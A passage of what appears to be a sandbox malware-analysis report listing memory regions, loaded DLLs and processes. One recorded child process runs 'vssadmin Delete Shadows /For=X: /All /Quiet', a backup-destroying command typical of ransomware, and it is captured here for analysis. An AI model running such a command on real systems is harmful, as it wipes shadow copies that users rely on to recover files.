	            name = "locale.nls"
	        filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")

Region:
	              id = 1735
	        start_va = 0x4880000
	          end_va = 0x4883fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004880000"
	        filename = ""

Region:
	              id = 1736
	        start_va = 0x76630000
	          end_va = 0x766aafff
	       monitored = 0
	     entry_point = 0x7664e970
	     region_type = mapped_file
	            name = "advapi32.dll"
	        filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll")

Region:
	              id = 1737
	        start_va = 0x76820000
	          end_va = 0x768ddfff
	       monitored = 0
	     entry_point = 0x76855630
	     region_type = mapped_file
	            name = "msvcrt.dll"
	        filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll")

Region:
	              id = 1738
	        start_va = 0x1c0000
	          end_va = 0x1fffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000001c0000"
	        filename = ""

Region:
	              id = 1739
	        start_va = 0x400000
	          end_va = 0x43ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000400000"
	        filename = ""

Region:
	              id = 1740
	        start_va = 0x570000
	          end_va = 0x57ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000570000"
	        filename = ""

Region:
	              id = 1741
	        start_va = 0x75f10000
	          end_va = 0x75f53fff
	       monitored = 0
	     entry_point = 0x75f29d80
	     region_type = mapped_file
	            name = "sechost.dll"
	        filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll")

Region:
	              id = 1778
	        start_va = 0x75ba0000
	          end_va = 0x75c4cfff
	       monitored = 0
	     entry_point = 0x75bb4f00
	     region_type = mapped_file
	            name = "rpcrt4.dll"
	        filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll")

Region:
	              id = 1779
	        start_va = 0x73d70000
	          end_va = 0x73d8dfff
	       monitored = 0
	     entry_point = 0x73d7b640
	     region_type = mapped_file
	            name = "sspicli.dll"
	        filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll")

Region:
	              id = 1780
	        start_va = 0x73d60000
	          end_va = 0x73d69fff
	       monitored = 0
	     entry_point = 0x73d62a00
	     region_type = mapped_file
	            name = "cryptbase.dll"
	        filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll")

Region:
	              id = 1781
	        start_va = 0x73e10000
	          end_va = 0x73e67fff
	       monitored = 0
	     entry_point = 0x73e525c0
	     region_type = mapped_file
	            name = "bcryptprimitives.dll"
	        filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll")

Region:
	              id = 1782
	        start_va = 0x76950000
	          end_va = 0x76a96fff
	       monitored = 0
	     entry_point = 0x76961cf0
	     region_type = mapped_file
	            name = "user32.dll"
	        filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll")

Region:
	              id = 1783
	        start_va = 0x75dc0000
	          end_va = 0x75f0efff
	       monitored = 0
	     entry_point = 0x75e76820
	     region_type = mapped_file
	            name = "gdi32.dll"
	        filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll")

Region:
	              id = 1784
	        start_va = 0x76cf0000
	          end_va = 0x76d81fff
	       monitored = 0
	     entry_point = 0x76d28cf0
	     region_type = mapped_file
	            name = "oleaut32.dll"
	        filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll")

Region:
	              id = 1785
	        start_va = 0x73ed0000
	          end_va = 0x7408cfff
	       monitored = 0
	     entry_point = 0x73fb2a10
	     region_type = mapped_file
	            name = "combase.dll"
	        filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll")

Region:
	              id = 1800
	        start_va = 0x766b0000
	          end_va = 0x766f4fff
	       monitored = 0
	     entry_point = 0x766cde90
	     region_type = mapped_file
	            name = "shlwapi.dll"
	        filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll")

Region:
	              id = 1801
	        start_va = 0x6f9d0000
	          end_va = 0x6f9e7fff
	       monitored = 0
	     entry_point = 0x6f9d4820
	     region_type = mapped_file
	            name = "atl.dll"
	        filename = "\\Windows\\SysWOW64\\atl.dll" (normalized: "c:\\windows\\syswow64\\atl.dll")

Region:
	              id = 1802
	        start_va = 0x6f9b0000
	          end_va = 0x6f9c0fff
	       monitored = 0
	     entry_point = 0x6f9b4670
	     region_type = mapped_file
	            name = "vsstrace.dll"
	        filename = "\\Windows\\SysWOW64\\vsstrace.dll" (normalized: "c:\\windows\\syswow64\\vsstrace.dll")

Region:
	              id = 1803
	        start_va = 0x6f890000
	          end_va = 0x6f9aafff
	       monitored = 0
	     entry_point = 0x6f8d0930
	     region_type = mapped_file
	            name = "vssapi.dll"
	        filename = "\\Windows\\SysWOW64\\vssapi.dll" (normalized: "c:\\windows\\syswow64\\vssapi.dll")

Region:
	              id = 1804
	        start_va = 0x76aa0000
	          end_va = 0x76afefff
	       monitored = 0
	     entry_point = 0x76aa4af0
	     region_type = mapped_file
	            name = "ws2_32.dll"
	        filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll")

Region:
	              id = 1840
	        start_va = 0x4890000
	          end_va = 0x48bffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004890000"
	        filename = ""

Region:
	              id = 1841
	        start_va = 0x48e0000
	          end_va = 0x49dffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000048e0000"
	        filename = ""

Region:
	              id = 1842
	        start_va = 0x580000
	          end_va = 0x707fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000580000"
	        filename = ""

Region:
	              id = 1843
	        start_va = 0x49e0000
	          end_va = 0x4a09fff
	       monitored = 0
	     entry_point = 0x49e5680
	     region_type = mapped_file
	            name = "imm32.dll"
	        filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll")

Region:
	              id = 1844
	        start_va = 0x75b70000
	          end_va = 0x75b9afff
	       monitored = 0
	     entry_point = 0x75b75680
	     region_type = mapped_file
	            name = "imm32.dll"
	        filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll")

Region:
	              id = 1845
	        start_va = 0x4890000
	          end_va = 0x489cfff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "vssadmin.exe.mui"
	        filename = "\\Windows\\SysWOW64\\en-US\\vssadmin.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\vssadmin.exe.mui")

Region:
	              id = 1846
	        start_va = 0x48b0000
	          end_va = 0x48bffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000048b0000"
	        filename = ""

Region:
	              id = 1847
	        start_va = 0x49e0000
	          end_va = 0x4b60fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000049e0000"
	        filename = ""

Region:
	              id = 1848
	        start_va = 0x4b70000
	          end_va = 0x5f6ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004b70000"
	        filename = ""

Region:
	              id = 1849
	        start_va = 0x20000
	          end_va = 0x20fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000020000"
	        filename = ""

Region:
	              id = 1850
	        start_va = 0x440000
	          end_va = 0x440fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000440000"
	        filename = ""

Region:
	              id = 1851
	        start_va = 0x48a0000
	          end_va = 0x48a3fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000048a0000"
	        filename = ""

Region:
	              id = 1873
	        start_va = 0x5f70000
	          end_va = 0x6059fff
	       monitored = 0
	     entry_point = 0x5fad650
	     region_type = mapped_file
	            name = "ole32.dll"
	        filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll")

Region:
	              id = 1886
	        start_va = 0x764a0000
	          end_va = 0x764abfff
	       monitored = 0
	     entry_point = 0x764a3930
	     region_type = mapped_file
	            name = "kernel.appcore.dll"
	        filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll")

Region:
	              id = 2405
	        start_va = 0x48c0000
	          end_va = 0x48c0fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000048c0000"
	        filename = ""

Region:
	              id = 2406
	        start_va = 0x76700000
	          end_va = 0x76783fff
	       monitored = 0
	     entry_point = 0x76726220
	     region_type = mapped_file
	            name = "clbcatq.dll"
	        filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll")

Region:
	              id = 2407
	        start_va = 0x48d0000
	          end_va = 0x48d0fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000048d0000"
	        filename = ""

Region:
	              id = 2425
	        start_va = 0x450000
	          end_va = 0x48ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000450000"
	        filename = ""

Region:
	              id = 2426
	        start_va = 0x490000
	          end_va = 0x4cffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000490000"
	        filename = ""

Region:
	              id = 2476
	        start_va = 0x4d0000
	          end_va = 0x50ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000004d0000"
	        filename = ""

Region:
	              id = 2477
	        start_va = 0x510000
	          end_va = 0x54ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000510000"
	        filename = ""

Region:
	              id = 2478
	        start_va = 0x710000
	          end_va = 0x74ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000710000"
	        filename = ""

Region:
	              id = 2479
	        start_va = 0x750000
	          end_va = 0x78ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000750000"
	        filename = ""

Region:
	              id = 3003
	        start_va = 0x5f70000
	          end_va = 0x604ffff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "kernelbase.dll.mui"
	        filename = "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui")

Region:
	              id = 3007
	        start_va = 0x6050000
	          end_va = 0x60cffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000006050000"
	        filename = ""

Region:
	              id = 3008
	        start_va = 0x60d0000
	          end_va = 0x60d8fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "vsstrace.dll.mui"
	        filename = "\\Windows\\SysWOW64\\en-US\\vsstrace.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\vsstrace.dll.mui")


Thread:
	id = 77
	os_tid = 0x1034


Thread:
	id = 84
	os_tid = 0x13f0


Thread:
	id = 116
	os_tid = 0x304


Thread:
	id = 119
	os_tid = 0xbf0


Thread:
	id = 120
	os_tid = 0x81c


Process:
	id = "24"
	image_name = "vssadmin.exe"
	filename = "c:\\windows\\syswow64\\vssadmin.exe"
	page_root = "0x30cc4000"
	os_pid = "0x1398"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "10"
	os_parent_pid = "0xe18"
	cmd_line = "vssadmin  Delete Shadows /For=X: /All /Quiet "
	cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\"
	os_username = "XC64ZB\\RDhJ0CNFevzX"
	bitness = "32"
	os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f1a9" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]

Region:
	              id = 1615
	        start_va = 0x10000
	          end_va = 0x2ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000010000"
	        filename = ""

Region:
	              id = 1616
	        start_va = 0x30000
	          end_va = 0x44fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000030000"
	        filename = ""

Region:
	              id = 1617
	        start_va = 0x50000
	          end_va = 0x8ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000050000"
	        filename = ""

Region:
	              id = 1618
	        start_va = 0x90000
	          end_va = 0xcffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000090000"
	        filename = ""

Region:
	              id = 1619
	        start_va = 0xd0000
	          end_va = 0xd3fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000000d0000"
	        filename = ""

Region:
	              id = 1620
	        start_va = 0xe0000
	          end_va = 0xe0fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000000e0000"
	        filename = ""

Region:
	              id = 1621
	        start_va = 0xf0000
	          end_va = 0xf1fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000000f0000"
	        filename = ""

Region:
	              id = 1622
	        start_va = 0x200000
	          end_va = 0x3fffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000200000"
	        filename = ""

Region:
	              id = 1623
	        start_va = 0x860000
	          end_va = 0x87dfff
	       monitored = 0
	     entry_point = 0x875810
	     region_type = mapped_file
	            name = "vssadmin.exe"
	        filename = "\\Windows\\SysWOW64\\vssadmin.exe" (normalized: "c:\\windows\\syswow64\\vssadmin.exe")

Region:
	              id = 1624
	        start_va = 0x880000
	          end_va = 0x487ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000880000"
	        filename = ""

Region:
	              id = 1625
	        start_va = 0x4880000
	          end_va = 0x4881fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004880000"
	        filename = ""

Region:
	              id = 1626
	        start_va = 0x77040000
	          end_va = 0x771bafff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "ntdll.dll"
	        filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll")

Region:
	              id = 1627
	        start_va = 0x7e240000
	          end_va = 0x7e262fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000000007e240000"
	        filename = ""

Region:
	              id = 1628
	        start_va = 0x7ffe0000
	          end_va = 0x7ffeffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000007ffe0000"
	        filename = ""

Region:
	              id = 1629
	        start_va = 0x7fff0000
	          end_va = 0x7df95ae6ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000007fff0000"
	        filename = ""

Region:
	              id = 1630
	        start_va = 0x7df95ae70000
	          end_va = 0x7ff95ae6ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00007df95ae70000"
	        filename = ""

Region:
	              id = 1631
	        start_va = 0x7ff95ae70000
	          end_va = 0x7ff95b030fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "ntdll.dll"
	        filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")

Region:
	              id = 1632
	        start_va = 0x7ff95b031000
	          end_va = 0x7ffffffeffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00007ff95b031000"
	        filename = ""

Region:
	              id = 1637
	        start_va = 0x100000
	          end_va = 0x1bffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000100000"
	        filename = ""

Region:
	              id = 1638
	        start_va = 0x586b0000
	          end_va = 0x586fffff
	       monitored = 0
	     entry_point = 0x586c8180
	     region_type = mapped_file
	            name = "wow64.dll"
	        filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll")

Region:
	              id = 1648
	        start_va = 0x58630000
	          end_va = 0x586a9fff
	       monitored = 0
	     entry_point = 0x58643290
	     region_type = mapped_file
	            name = "wow64win.dll"
	        filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll")

Region:
	              id = 1649
	        start_va = 0x76d90000
	          end_va = 0x76e6ffff
	       monitored = 0
	     entry_point = 0x76da3980
	     region_type = mapped_file
	            name = "kernel32.dll"
	        filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll")

Region:
	              id = 1650
	        start_va = 0x58700000
	          end_va = 0x58707fff
	       monitored = 0
	     entry_point = 0x587017c0
	     region_type = mapped_file
	            name = "wow64cpu.dll"
	        filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll")

Region:
	              id = 1651
	        start_va = 0x4890000
	          end_va = 0x4a6ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004890000"
	        filename = ""

Region:
	              id = 1677
	        start_va = 0x76d90000
	          end_va = 0x76e6ffff
	       monitored = 0
	     entry_point = 0x76da3980
	     region_type = mapped_file
	            name = "kernel32.dll"
	        filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll")

Region:
	              id = 1678
	        start_va = 0x74590000
	          end_va = 0x7470dfff
	       monitored = 0
	     entry_point = 0x74641b90
	     region_type = mapped_file
	            name = "kernelbase.dll"
	        filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll")

Region:
	              id = 1714
	        start_va = 0x10000
	          end_va = 0x1ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000010000"
	        filename = ""

Region:
	              id = 1715
	        start_va = 0x7e140000
	          end_va = 0x7e23ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000000007e140000"
	        filename = ""

Region:
	              id = 1831
	        start_va = 0x400000
	          end_va = 0x4bdfff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "locale.nls"
	        filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")

Region:
	              id = 1832
	        start_va = 0x4880000
	          end_va = 0x4883fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004880000"
	        filename = ""

Region:
	              id = 1833
	        start_va = 0x76630000
	          end_va = 0x766aafff
	       monitored = 0
	     entry_point = 0x7664e970
	     region_type = mapped_file
	            name = "advapi32.dll"
	        filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll")

Region:
	              id = 1834
	        start_va = 0x76820000
	          end_va = 0x768ddfff
	       monitored = 0
	     entry_point = 0x76855630
	     region_type = mapped_file
	            name = "msvcrt.dll"
	        filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll")

Region:
	              id = 1835
	        start_va = 0x100000
	          end_va = 0x13ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000100000"
	        filename = ""

Region:
	              id = 1836
	        start_va = 0x140000
	          end_va = 0x17ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000140000"
	        filename = ""

Region:
	              id = 1837
	        start_va = 0x1b0000
	          end_va = 0x1bffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000001b0000"
	        filename = ""

Region:
	              id = 1838
	        start_va = 0x75f10000
	          end_va = 0x75f53fff
	       monitored = 0
	     entry_point = 0x75f29d80
	     region_type = mapped_file
	            name = "sechost.dll"
	        filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll")

Region:
	              id = 1839
	        start_va = 0x75ba0000
	          end_va = 0x75c4cfff
	       monitored = 0
	     entry_point = 0x75bb4f00
	     region_type = mapped_file
	            name = "rpcrt4.dll"
	        filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll")

Region:
	              id = 1866
	        start_va = 0x73d70000
	          end_va = 0x73d8dfff
	       monitored = 0
	     entry_point = 0x73d7b640
	     region_type = mapped_file
	            name = "sspicli.dll"
	        filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll")

Region:
	              id = 1867
	        start_va = 0x73d60000
	          end_va = 0x73d69fff
	       monitored = 0
	     entry_point = 0x73d62a00
	     region_type = mapped_file
	            name = "cryptbase.dll"
	        filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll")

Region:
	              id = 1868
	        start_va = 0x73e10000
	          end_va = 0x73e67fff
	       monitored = 0
	     entry_point = 0x73e525c0
	     region_type = mapped_file
	            name = "bcryptprimitives.dll"
	        filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll")

Region:
	              id = 1869
	        start_va = 0x76950000
	          end_va = 0x76a96fff
	       monitored = 0
	     entry_point = 0x76961cf0
	     region_type = mapped_file
	            name = "user32.dll"
	        filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll")

Region:
	              id = 1870
	        start_va = 0x75dc0000
	          end_va = 0x75f0efff
	       monitored = 0
	     entry_point = 0x75e76820
	     region_type = mapped_file
	            name = "gdi32.dll"
	        filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll")

Region:
	              id = 1871
	        start_va = 0x76cf0000
	          end_va = 0x76d81fff
	       monitored = 0
	     entry_point = 0x76d28cf0
	     region_type = mapped_file
	            name = "oleaut32.dll"
	        filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll")

Region:
	              id = 1879
	        start_va = 0x73ed0000
	          end_va = 0x7408cfff
	       monitored = 0
	     entry_point = 0x73fb2a10
	     region_type = mapped_file
	            name = "combase.dll"
	        filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll")

Region:
	              id = 1880
	        start_va = 0x6f9d0000
	          end_va = 0x6f9e7fff
	       monitored = 0
	     entry_point = 0x6f9d4820
	     region_type = mapped_file
	            name = "atl.dll"
	        filename = "\\Windows\\SysWOW64\\atl.dll" (normalized: "c:\\windows\\syswow64\\atl.dll")

Region:
	              id = 1881
	        start_va = 0x6f9b0000
	          end_va = 0x6f9c0fff
	       monitored = 0
	     entry_point = 0x6f9b4670
	     region_type = mapped_file
	            name = "vsstrace.dll"
	        filename = "\\Windows\\SysWOW64\\vsstrace.dll" (normalized: "c:\\windows\\syswow64\\vsstrace.dll")

Region:
	              id = 1882
	        start_va = 0x766b0000
	          end_va = 0x766f4fff
	       monitored = 0
	     entry_point = 0x766cde90
	     region_type = mapped_file
	            name = "shlwapi.dll"
	        filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll")

Region:
	              id = 1883
	        start_va = 0x6f890000
	          end_va = 0x6f9aafff
	       monitored = 0
	     entry_point = 0x6f8d0930
	     region_type = mapped_file
	            name = "vssapi.dll"
	        filename = "\\Windows\\SysWOW64\\vssapi.dll" (normalized: "c:\\windows\\syswow64\\vssapi.dll")

Region:
	              id = 1884
	        start_va = 0x76aa0000
	          end_va = 0x76afefff
	       monitored = 0
	     entry_point = 0x76aa4af0
	     region_type = mapped_file
	            name = "ws2_32.dll"
	        filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll")

Region:
	              id = 1885
	        start_va = 0x4a70000
	          end_va = 0x4c6ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004a70000"
	        filename = ""

Region:
	              id = 1887
	        start_va = 0x4c0000
	          end_va = 0x647fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000004c0000"
	        filename = ""

Region:
	              id = 1888
	        start_va = 0x4890000
	          end_va = 0x48b9fff
	       monitored = 0
	     entry_point = 0x4895680
	     region_type = mapped_file
	            name = "imm32.dll"
	        filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll")

Region:
	              id = 1889
	        start_va = 0x4970000
	          end_va = 0x4a6ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004970000"
	        filename = ""

Region:
	              id = 1890
	        start_va = 0x75b70000
	          end_va = 0x75b9afff
	       monitored = 0
	     entry_point = 0x75b75680
	     region_type = mapped_file
	            name = "imm32.dll"
	        filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll")

Region:
	              id = 1910
	        start_va = 0x650000
	          end_va = 0x7d0fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000650000"
	        filename = ""

Region:
	              id = 1911
	        start_va = 0x4890000
	          end_va = 0x489cfff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "vssadmin.exe.mui"
	        filename = "\\Windows\\SysWOW64\\en-US\\vssadmin.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\vssadmin.exe.mui")

Region:
	              id = 1912
	        start_va = 0x4c70000
	          end_va = 0x606ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004c70000"
	        filename = ""

Region:
	              id = 1913
	        start_va = 0x20000
	          end_va = 0x20fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000020000"
	        filename = ""

Region:
	              id = 1914
	        start_va = 0x180000
	          end_va = 0x180fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000180000"
	        filename = ""

Region:
	              id = 1915
	        start_va = 0x48a0000
	          end_va = 0x48a3fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000048a0000"
	        filename = ""

Region:
	              id = 1916
	        start_va = 0x4a70000
	          end_va = 0x4b59fff
	       monitored = 0
	     entry_point = 0x4aad650
	     region_type = mapped_file
	            name = "ole32.dll"
	        filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll")

Region:
	              id = 1917
	        start_va = 0x4c60000
	          end_va = 0x4c6ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004c60000"
	        filename = ""

Region:
	              id = 1964
	        start_va = 0x764a0000
	          end_va = 0x764abfff
	       monitored = 0
	     entry_point = 0x764a3930
	     region_type = mapped_file
	            name = "kernel.appcore.dll"
	        filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll")

Region:
	              id = 2411
	        start_va = 0x48b0000
	          end_va = 0x48b0fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000048b0000"
	        filename = ""

Region:
	              id = 2412
	        start_va = 0x76700000
	          end_va = 0x76783fff
	       monitored = 0
	     entry_point = 0x76726220
	     region_type = mapped_file
	            name = "clbcatq.dll"
	        filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll")

Region:
	              id = 2413
	        start_va = 0x48c0000
	          end_va = 0x48c0fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000048c0000"
	        filename = ""

Region:
	              id = 2498
	        start_va = 0x1c0000
	          end_va = 0x1fffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000001c0000"
	        filename = ""

Region:
	              id = 2499
	        start_va = 0x7e0000
	          end_va = 0x81ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000007e0000"
	        filename = ""

Region:
	              id = 2525
	        start_va = 0x820000
	          end_va = 0x85ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000820000"
	        filename = ""

Region:
	              id = 2526
	        start_va = 0x48d0000
	          end_va = 0x490ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000048d0000"
	        filename = ""

